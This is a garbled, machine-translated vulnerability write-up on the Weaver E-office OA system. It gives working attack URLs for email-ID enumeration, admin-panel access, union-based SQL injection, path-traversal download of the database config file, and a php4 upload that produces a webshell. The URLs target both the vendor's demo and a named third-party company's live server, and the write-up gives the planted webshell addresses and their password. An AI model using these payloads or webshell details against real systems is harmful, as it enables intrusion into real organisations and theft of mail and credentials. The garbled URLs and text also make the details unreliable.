Weaver OA vulnerability set (SQL injection, unauthorized access, etc)

Weaver OA vulnerability set (SQL injection, unauthorized access, etc)

0x00: Some nonsense

No one has reported the following vulnerabilities. Do not repeat them with any vulnerabilities (points are definitely different )!

WooYun: Weaver E-office OA Management System # verify its versatility: SQL Injection, Arbitrary File Download, file upload, and other vulnerabilities

Here, we use (1) official demonstration (2) a case to demonstrate its general type.

The official test account is Xia Jing, and the test account is Cheng Lin.

0x01: Parallel excessive permissions, resulting in viewing email information of any user

 

Question: http://www.xxx.com/general/email/new/index.php? EMAIL_ID = 7

Problem parameter: EMAIL_ID

Problem description: traverses the value of the EMAIL_ID parameter to view others' mail information.


(1) official demonstration:

Http://eoffice8.weaver.cn: 8028/general/email/new/index. php? EMAIL_ID = 9503
 

Http://eoffice8.weaver.cn: 8028/general/email/new/index. php? EMAIL_ID = 9504
 

(2) Case study:

Http://www.sjd-logistics.com: 8000/general/email/new/index. php? EMAIL_ID = 726155
 

Http://www.sjd-logistics.com: 8000/general/email/new/index. php? EMAIL_ID = 726152
 

0x02: direct operation of data tables due to vertical disauthorization
 

Problem link: http://www.xxoo.com/ikernel/admin/

Problem description: After logging on to the OA system, you can access the ikernel directory, but the system prompts "no operation permission". In this case, you can directly access the ikernel/admin/directory, you can operate on the table structure and the table itself.


(1) official demonstration:

Some of the information displayed is garbled or unclear, so you can select all the information for convenience.
 

 

 

(2) Case study:
 

 

 

0x03: SQL injection vulnerability caused by vertical Elevation of Privilege

Question: http://www.xxx.com/ikernel/admin/IK_TABLE/field? TABLE_ID = 9

Problem parameter: TABLE_ID

Problem description: It seems that a lot of injection exists here, and only one point is selected in the test. Although gpc is on, the numeric type does not affect it.


(1) official demonstration:

Get Database Current user http://eoffice8.weaver.cn: 8028/ikernel/admin/IK_TABLE/field /? TABLE_ID = 9% 20and % 201 = 2% 20 union % 20 select % 20 user ()
 

Get the current database name http://eoffice8.weaver.cn: 8028/ikernel/admin/IK_TABLE/field /? TABLE_ID = 9% 20and % 201 = 2% 20 union % 20 select % 20 database ()
 

(2) Case study:

Get Database Current user http://www.sjd-logistics.com: 8000/ikernel/admin/IK_TABLE/field /? TABLE_ID = 9% 20and % 201 = 2% 20 union % 20 select % 20 user ()
 

Get the current database name http://www.sjd-logistics.com: 8000/ikernel/admin/IK_TABLE/field /? TABLE_ID = 9% 20and % 201 = 2% 20 union % 20 select % 20 database ()
 

0x04: File Download Vulnerability

 

Question: http://www.xxx.com/general/notify/show/header.php? ATTACHMENT_ID = 1738682577 & FILE_NAME =.../../inc/oa_config.php

Problem description: the download is a zend-encrypted file that can be decrypted online. This file contains the database link file. The test found that the official file is no longer an encrypted file.

(1) official demonstration:

Http://eoffice8.weaver.cn: 8028/general/pretty y/show/header. php? ATTACHMENT_ID = 1738682577 & FILE_NAME =.../../inc/oa_config.php
 

(2) Case study:

Http://www.sjd-logistics.com: 8000/general/pretty y/show/header. php? ATTACHMENT_ID = 1738682577 & FILE_NAME =.../../inc/oa_config.php
 

 

 

0x05: Arbitrary Code Execution caused by File Upload

Problem link: http://www.xxx.com/general/email/

Problem description: In the attachment of [internal mail]-[new mail], you can upload the php4 file type (the php4 file can be uploaded by capturing and modifying the package in the official demo ), view the source code to find the corresponding file path. Finally, the webshell access path is http://www.xxx.com/attachment/the desired region in the source code /file name .php4.

(1) official demonstration:

The obtained webshell address is: http://eoffice8.weaver.cn: 8028/attachment/1915193417/conf1g. php4 password 8
 

 

(2) Case study:

The obtained webshell address is: http://www.sjd-logistics.com: 8000/attachment/950753027/conf1g. php4 password 8